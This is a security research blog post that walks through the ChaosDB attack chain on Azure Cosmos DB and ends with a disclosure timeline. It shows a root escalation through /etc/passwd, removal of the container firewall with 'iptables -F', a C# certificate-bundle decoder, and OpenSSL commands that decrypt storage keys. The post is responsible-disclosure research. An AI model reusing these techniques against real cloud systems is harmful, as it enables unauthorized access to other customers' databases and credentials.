ChaosDB explained: Azure's Cosmos DB vulnerability walkthrough
This is the full story of the Azure ChaosDB Vulnerability that was discovered and disclosed by the Wiz Research Team, where we were able to gain complete unrestricted access to the databases of several thousand Microsoft Azure customers.
This is the full story of the Azure ChaosDB Vulnerability that was discovered and disclosed by the Wiz Research Team, where we were able to gain complete unrestricted access to the databases of several thousand Microsoft Azure customers. In August 2021, we disclosed to Microsoft a new vulnerability in Cosmos DB that ultimately allowed us to retrieve numerous internal keys that can be used to manage the service, following this high-level workflow:
Set up a Jupyter Notebook container on your Azure Cosmos DB
Run any C# code to obtain root privileges
Remove firewall rules set locally on the container in order to gain unrestricted network access
Query WireServer to obtain information about installed extensions, certificates and their corresponding private keys
Connect to the local Service Fabric, list all running applications, and obtain the Primary Key to other customers' databases
Access Service Fabric instances of multiple regions over the internet
In this post we walk you through every step of the way, to the point where we even gained administrative access to some of the magic that powers Azure.
Azure Cosmos DB is a fully managed NoSQL database for modern app development. Single-digit millisecond response times, with automatic and instant scalability, guarantee speed at any scale. Business continuity is assured with SLA-backed availability and enterprise-grade security.
Launched in May 2017, Cosmos DB is a globally distributed database solution used by high-profile customers, including many Fortune500 companies (according to gotocosmos.com).
Cosmos DB can be accessed via API keys for reading, writing, and deleting operations, and its permissions can be managed by standard Azure IAM. To perform any operation on a Cosmos DB instance, you simply need to supply the Cosmos DB endpoint and an appropriate API key (Primary Key). The Primary Key for a Cosmos DB Account is the equivalent of the root password in traditional, on-premises databases.
What is Jupyter Notebook?
The Azure Cosmos DB instances (used to) come with an embedded Jupyter Notebook container, an open-source web application that allows you to create and share documents that contain live code, equations, visualizations, and narrative text (read more about it here). Basically, it is a very cool way to represent data using code.
The Jupyter Notebook Container offers terminal access as well as the option to interact with your Cosmos DB instance using different programming languages (Python, C#, etc). The credentials to the Cosmos DB Account are pre-configured in the environment variables of the container image, to use and access via the SDK transparently.
Bug #1: Jupyter Notebook Local Privilege Escalation (LPE)
We knew that, by design, you could execute arbitrary code on Jupyter Notebook. A few minutes later, we had already gained root privileges. How?
When we used the embedded Jupyter terminal or the default Python3 Notebook, our code was being executed as the unprivileged, non-sudo'er user named cosmosuser. It seems that the service developers’ intention was that any code executed in this interface would be executed as cosmosuser.
However, when we executed some C# code, we noticed it was being executed with root privileges.
Yes, we were surprised as well.
It seems that every programming language the Jupyter Notebook supports has its own “host” process responsible for executing user-supplied code, and communicating the output to the Web-UI. For some unknown reason, the host process for C# specifically was running with root privileges, which meant that any C# code would be executed as root as well. We used this misconfiguration to escalate our privileges inside the container: we appended a line to the /etc/passwd file, created a new user with uid=0 and gid=0, switched to this user using the su command, and were effectively granted root privileges inside the container. And if you are asking yourself why we wanted to obtain root privileges in the first place, the answer is very simple – we were curious about this environment: who owns it? Is it shared across users? We assumed, that as root, we may be able to answer some of our unanswered questions.
Bug #2: Unrestricted Network Access
iptables –F was all it took.
After gaining root privileges we started poking around the container, and amongst other things, we issued the iptables command to view the local firewall rules determining which network resources we could, and more interestingly, could not, access.
Looking at the iptables rules, we found these supposedly forbidden addresses:
10.0.0.0/16 subnet, an internal subnet we were not familiar with
168.63.129.16, another unfamiliar IP address
Why did the service developers configure these specific rules to prevent us from accessing these specific IP addresses? Good thing (or bad, depending whose side you are on) these firewall rules were configured locally on the container where we were currently running as root. So, we simply deleted the rules (by issuing iptables -F), clearing the way to these forbidden IP addresses and to some even more interesting findings.
It is important to point out that, in our opinion, a safer approach to enforce these firewall rules is outside the Jupyter Notebook container, where a hacker cannot bypass them even with root privileges.
Bug #3: Not the Certificate We Deserve, but the Certificate We Need
After the jailbreak that we achieved with the two previous bugs (Jupyter Notebook LPE and Unrestricted Network Access), we conducted some network recon that involved accessing the previously forbidden IP addresses. The way we saw it was that if the developers went through the trouble of explicitly attempting to prevent us from accessing these addresses, then we should most definitely go through the trouble of attempting to access them.
Accessing forbidden IP address #1 – IMDS
169.254.169.254 is the Azure Metadata Service (IMDS). This service holds metadata about the currently running virtual machine instance, such as storage, network configuration and more. You simply send an HTTP request and retrieve unique information per Virtual Machine (VM). We issued a request, and discovered a couple of interesting things:
Our Azure environment was set to AzurePublicCloud, and our subscription ID was not a subscription that we owned.
Our osType was set to Windows, even though we were running Linux commands on a Linux terminal.
We have an IP Address in the 10.0.0.0/16 subnet – the same subnet we are not supposed to access according to the firewall rules we just removed.
Putting these together, we realized we were not querying the Metadata Service of our container, but that of our HOST MACHINE, which seems to be hosted in some sort of a shared environment!
After googling IP address 168.63.129.16, we discovered that it is a virtual IP address that exists on every Azure VM, and is referred to as the WireServer:
Microsoft offers almost no official documentation for WireServer. However, Paul Litvak from Intezer did an amazing job researching it! Check out his blog post regarding past vulnerabilities involving Azure WireServer.
We learned that WireServer manages aspects and features of VMs within Azure, and specifically the extensions of every Azure VM. Extensions are software applications that Azure manages, either first-party software like Azure’s log analytics agent, or third-party software that Azure supports like Datadog. Apparently, in order to install and configure these extensions, all Azure VMs come pre-installed with one of two agents, one for Windows and one for Linux. You can think of WireServer as the backend of these agents, used to supply any information the agent needs in order to function properly.
Going back to the WireServer agent for Linux, also known as the WA-Agent or the WA-Linux-Agent, we realized it was an open-source project hosted on GitHub. So we delved into the source code to learn more about WireServer functionalities.
Understanding WireServer
WireServer can be queried using HTTP and has several endpoints that are interesting for our research purposes:
Goal state–Essentially, a phone book of endpoints that the agent needs to query in order to fetch different configuration settings. You can download any Azure VM Goal State to retrieve all configuration endpoints specific for your virtual machine by executing a simple cURL command, as can be seen in the snippet below.
ExtensionsConfig–As its name suggests, ExtensionsConfig stores information about all the extensions installed on the VM. Sometimes, these configurations contain sensitive information such as hardcoded passwords or keys, and this info is encrypted.
Certificates–Stores the encryption keys used to decrypt the encrypted segments in the ExtensionsConfig.
To obtain information about our machine’s extensions, we first executed a cURL command to fetch the machine’s Goal State. The result was the underlying virtual machine Goal State, including its ExtensionsConfig URL, which we then also queried.
These extensions were most likely installed on our HOST, the Windows-based VM, and not our private Linux container. The next logical step was to extract information from these configurations and maybe uncover secrets we could later use for lateral movement within the Cosmos DB environment.
Retrieving decryption keys
Most extensions contain these two sections:
publicSettings–plain-text section holding generic information about the VM extension and settings.
protectedSettings–encrypted section holding sensitive information about the VM extension.
Hardcoded credentials and/or sensitive info are supposed to be stored in the protectedSettings section of our extensions. So how does the agent decrypt this sensitive data? Where does it get the decryption key? The answer is the Certificates endpoint. But to retrieve the certificates for the decryption, the agent first needs to take an extra precaution and supply a self-signed transport certificate that would be used to encrypt the certificates bundle. Fortunately, this transport certificate is not validated by the server, meaning we can supply our own without relying on any certificate that has been previously generated by the host machine’s agent. The way to supply this public key is by including it in the x-ms-guest-agent-public-x509-cert header.
To this point, every time we queried the Certificates endpoint (in any other service), we always retrieved the certificates encoded in the Pkcs7BlobWithPfxContents format, as can be seen in figure below. This is the certificate bundle, encrypted in a way that only the private key that matches the public key supplied in the x-ms-guest-agent-public-x509-cert header can decrypt.
However, when we performed the exact same steps on the Jupyter Notebook environment, we retrieved the certificates encoded in another format – Certificates Bond Package.
This is the first time we’d ever encountered this format. Unfortunately, the OpenSSL commands that we are used to executing to decrypt the standard format did not work here. Time to up our game and try to decode this format!
Decoding Certificates Bond Package
Our search for the Certificate Bond Package format on Google did not yield an answer:
Where do we go from here? We decided to reverse engineer the clients of the WireServer, the VM agents. We assumed that if anything knew how to decode this format, it would be these agents that rely on this information to function properly.
Looking at the Linux agent first, we could not find any reference to the mysterious Certificate Bond Package format.
Moving on to investigate the Windows agent, we knew that according to the IMDS metadata service, even though we were running inside a Linux container, our host VM was a Windows VM. This means that all responses from the WireServer are meant to be treated by the Windows agent, not the Linux one. And this was the breakthrough we needed to continue.
Unlike the WA-Agent, the Windows virtual machine agent (also known as the Windows Azure Guest Agent.exe), is not open-source. But it is written in C#, so we could decompile it into something that resembles source code fairly easily. There are a number of tools out there that can do this—we chose ILSpy.
Here is the ILSpy view of Microsoft.WindowsAzure.RoleContainer.dll, part of Windows Azure Guest Agent.exe:
Followed by the ILSpy view of Microsoft.WindowsAzure.Security.CredentialsManagement.Package.dll, part of WindowsAzureGuestAgent.exe:
And there you have it! Finally, we have our first reference to the elusive CertificatesBondPackage format, along with its handling code.
Using existing functionalities of the Windows Agent, we wrote a simple snippet that mimics the agent’s decoding of the Certificates Bond Package, in order to obtain the keys in the familiar pkcs7 file format.
using Microsoft.Cis.Fabric.CertificateServices;
using Microsoft.WindowsAzure.GuestAgent.CertificateManager;
using Microsoft.WindowsAzure.Security.CredentialsManagement.Package;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading.Tasks;
using Bond.IO;
using Bond.IO.Unsafe;
using RD.Security.Dsms;
using Bond;
using Bond.Protocols;
namespace ConsoleApp2
{
classProgram {staticvoidMain(string[] args){
byte[] cert = File.ReadAllBytes(@"cerificate_bond.bin");
InputBuffer input = new InputBuffer(cert);
ManagedCertificatesPackage managedCertsData = Deserialize<SecretsPackage>.From(new CompactBinaryReader<InputBuffer>(input, 1)).ManagedCertsPackage;
var managedCertData = managedCertsData.CertsData;
byte[] array = new byte[managedCertData.Count];
Array.Copy(managedCertData.Array, managedCertData.Offset, array, 0, managedCertData.Count);
byte[] data = array;
File.WriteAllBytes(@"ManagedCertsPackage.bin", data);
InputBuffer input2 = new InputBuffer(cert);
ArraySegment<byte> unmanagedCertsData = Deserialize<SecretsPackage>.From(new CompactBinaryReader<InputBuffer>(input2, 1)).UnmanagedCertsData;
var unmanagedCertData = unmanagedCertsData;
byte[] array2 = new byte[unmanagedCertData.Count];
Array.Copy(unmanagedCertData.Array, unmanagedCertData.Offset, array2, 0, unmanagedCertData.Count);
byte[] data2 = array2;
File.WriteAllBytes(@"UnmanagedCertsData.bin", data2);
}
}
}
Now, after decoding and decrypting the Certificate Bond Package, we expected to get two keys: a private key and a public key used to encrypt and decrypt the protected settings.
In reality, we got back 25 keys.
Yes, 25 Microsoft certificates AND their corresponding private keys.
The Certificates Bond Package contained a bunch of certificates we probably shouldn’t have had; we will take a closer look at these three:
fabricsecrets.documents.azure.com
fabric.westus1.cosmos.azure.com
*.notebook.cosmos.azure.com (this alone allows us to intercept encrypted SSL traffic of customers’ Jupyter Notebook running on the HOST Windows VM...)
What is the legitimate purpose for these certificates?
Accessing Storage Accounts and Internal Service Fabric
Going back to ExtensionConfig, we realized the ServiceFabricNode extension had some interesting information in its public settings: it contained the cluster endpoint for the machine’s Service Fabric cluster, along with the common name of the certificate required for authentication:
When we accessed the clusterEndpoint URL from Google Chrome, we were prompted to supply a client certificate for authentication. We concluded that our best bet would be to use the fabric.westus1.cosmos.azure.com certificate we obtained earlier from WireServer, since it was mentioned in the publicSettings of the ServiceFabricNodeExtension.
What we got back was a huge XML formatted manifest file with lots of cluster information, including multiple connection-strings to multiple Azure Storage Accounts that can be accessed with the Storage Account Key found in the decrypted protectedSettings section of our ExtensionConfig:
For future reference, these are the OpenSSL commands we used to decrypt the protectedSettings section:
user@laptop:~/cosmos$ ls -la
total 144
drwxr-xr-x 2 user user 4096 Aug 9 20:37 .
drwxr-xr-x 3 user user 4096 Aug 9 19:53 ..
-rw------- 1 user user 121900 Aug 9 18:32 ManagedCertificates.pem
-rw------- 1 user user 3144 Aug 9 18:35 UnmanagedCertificates.pem
user@laptop:~/cosmos$ cat UnmanagedCertificates.pem | sed -n '/-----BEGIN PRIVATE KEY-----$/,/^-----END PRIVATE KEY-----$/p' > protected-key.pem
user@laptop:~/cosmos$ cat UnmanagedCertificates.pem | sed -n '/-----BEGIN CERTIFICATE-----$/,/^-----END CERTIFICATE-----$/p' > protected-cert.pem
user@laptop:~/cosmos$ echo MIIB0AYJKoZIhvcN...redacted...pqF8om/4fhhMgqGpu | base64 -d | openssl smime -inform DER -decrypt -recip protected-cert.pem -inkey protected-key.pem
{"Placeholder":"NothingImportant"}
user@laptop:~/cosmos$ echo MIICkwYJKoZIhvcN...redacted...pMd+kxSTnWwJLOwgl | base64 -d | openssl smime -inform DER -decrypt -recip protected-cert.pem -inkey protected-key.pem
{"StorageAccountKey1":"55410uWV0y5X...redacted...XCUEN2upGg==","StorageAccountKey2":"kNY61/TqYr4r...redacted...KOvBat3NbQ=="}
We accessed these storage accounts using Azure Storage Explorer and found hundreds of gigabytes of metadata and operational logs, as well as millions of records about Cosmos DB’s underlying infrastructure:
We then noticed this section in the manifest.xml file that describes the Service Fabric nodes:
If you’ve been paying close attention so far, you’d recall that our jailbreak included removing local firewall rules from the iptables that prevented us from accessing the 10.0.0.0/16 subnet, which we see in the manifest file above. This means, we could now access it freely. This also means we could access the local Service Fabric HttpGatewayEndpoint on port 19080 from our Jupyter Notebook container, which, as the manifest file suggests, could be authenticated using fabric.westus1.cosmos.azure.com.
Now would be a good time to pause and ask, what is the Service Fabric anyway? According to Microsoft’s documentation, Azure Service Fabric is a distributed systems platform that makes it easy to package, deploy, and manage scalable and reliable microservices and containers. So, we can treat it as an alternative to Kubernetes. Good.
Listing the applications
We connected and authenticated to our local Service Fabric on port 19080 with the fabric.westus1.cosmos.azure.com certificate, using the sfctl command line. We then used the sfctl application list command in order to list the running application instances.
The output gave us a list of all Cosmos DB instances (more than 500!) that were managed by this regional cluster, including those that do not belong to our account:
Going over the output of the executed command, we thought these fields were particularly interesting:
COSMOSDB_ ACCOUNT_ KEY_ENCRYPTED
NOTEBOOK_ AUTH_ TOKEN_ ENCRYPTED
NOTEBOOK_ STORAGE_ ACCOUNT_ KEY_ENCRYPTED
Even though these secrets were encrypted (as their name suggests), we had the certificate required for decryption: fabricsecrets.documents.azure.com. These are the commands used in order to decrypt the secrets using the fabricsecrets. documents. azure.com certificate:
Using the information we obtained by taking advantage of the misconfigurations described above, we were able to:
Obtain the plaintext Primary Key for any Cosmos DB instance running in our cluster, granting us the ability to query and manipulate customers’ databases without any authorization. This can be done by decrypting COSMOSDB_ ACCOUNT_ KEY_ ENCRYPTED with the certificate for fabricsecrets.documents.azure.com.
Obtain the plaintext auth token for any Jupyter Notebook instance running in our cluster, granting us the ability to execute arbitrary code on customers’ Jupyter VMs without any authorization. This can be done by decrypting NOTEBOOK_STORAGE_ACCOUNT_KEY_ENCRYPTED with the certificate for fabricsecrets.documents.azure.com, and accessing the Jupyter notebook located at NOTEBOOK_ PROXY_ PATH.
Obtain plaintext passwords for customers’ notebook storage accounts, granting us the ability to access and manipulate customers’ private saved notebooks. This can be done by decrypting NOTEBOOK_ STORAGE_ ACCOUNT_ KEY_ ENCRYPTED with the certificate for fabricsecrets.documents.azure.com, and using the information in NOTEBOOK_ STORAGE_ FILE_ENDPOINT with Azure Storage Explorer.
Obtain the certificate for *.notebook.cosmos.azure.com, granting us the ability to intercept SSL traffic to these endpoints.
Obtain metadata about the underlying infrastructure of Cosmos DB by accessing internal Azure storage blobs.
Access the underlying infrastructure of Cosmos DB by browsing to Service Fabric Explorer located on various endpoints and authenticating with fabric.westus1.cosmos.azure.com.
Demo
Accessing the Infrastructure Externally
We mentioned earlier multiple Azure Storage Accounts that we think contained metadata information about the underlying infrastructure of Cosmos DB. After reviewing these log files, we noticed that some of them contained information about public Service Fabrics that were supposedly accessible from the internet (compared to the LAN access that was required earlier).
We performed a network scan for port 19080 on Microsoft’s ASN and found 100+ instances of Service Fabric that were accessible via this port. We attempted to connect to each of these Service Fabric using the certificate we obtained earlier (fabric.westus1.cosmos.azure.com) and to our surprise, the authentication was successful!
Using just one certificate, we managed to authenticate to internal Service Fabric instances of multiple regions that were accessible from the internet.
And a partial list of Service Fabric instances that were found in our network scan:
Conclusion
We managed to gain unauthorized access to customers’ Azure Cosmos DB instances by taking advantage of a chain of misconfigurations in the Jupyter Notebook Container feature of Cosmos DB. We were able to prove access to thousands of companies’ Cosmos DB Instances (database, notebook environment, notebook storage) with full admin control via multiple authentication tokens and API keys. Among the affected customers are many Fortune 500 companies. We also managed to gain access to the underlying infrastructure that runs Cosmos DB and we were able to prove that this access can be maintained outside of the vulnerable application—over the internet. Overall, we think that this is as close as it gets to a “Service Takeover”.
Disclosure Timeline
August 09 2021 - Wiz Research Team first exploited the bug and gained unauthorized access to Cosmos DB accounts.
August 11 2021 - Wiz Research Team confirmed intersection with Wiz customers.
August 12 2021 - Wiz Research Team sent the advisory to Microsoft.
August 14 2021 - Wiz Research Team observed that the vulnerable feature has been disabled.
August 16 2021 - Microsoft Security Response Center (MSRC) confirmed the reported behavior (MSRC Case 66805).
August 16 2021 - Wiz Research Team observed that some obtained credentials have been revoked.
August 17 2021 - MSRC awarded $40,000 bounty for the report.
August 23 2021 - MSRC confirmed that several thousand customers were affected.
August 23 2021 - MSRC and Wiz Research Team discussed public disclosure strategy.
August 25 2021 - Public disclosure.
Stay in touch!
Hi there! We are Nir Ohfeld and Sagi Tzadik from the Wiz Research Team. We are both veteran BlackHat speakers, white-hat hackers, but first and foremost two very good friends who in their spare time save the world from Cloud Vulnerabilities 😊 A little about us: Nir has been recently ranked 3rd on the MSRC 2021 Q3 Research Researcher Leaderboard, while Sagi is constantly coming up with new ideas and endless creativity when it comes to game-hacking and reverse-engineering.
We’d love to hear from you!
Follow us on Twitter (@sagitz_ & @nirohfeld) and subscribe to our blog. We have plenty of surprises in the pipeline!
A summary and recording of Wiz's talk at BlackHat Europe 2021: the full extent of ChaosDB, the impact it had, and the questions it raises about security in managed cloud services.
Customers have come to realize ignorance isn’t bliss. Cloud has gotten too big and unwieldy for most companies to effectively manage on their own. That’s where Wiz comes in.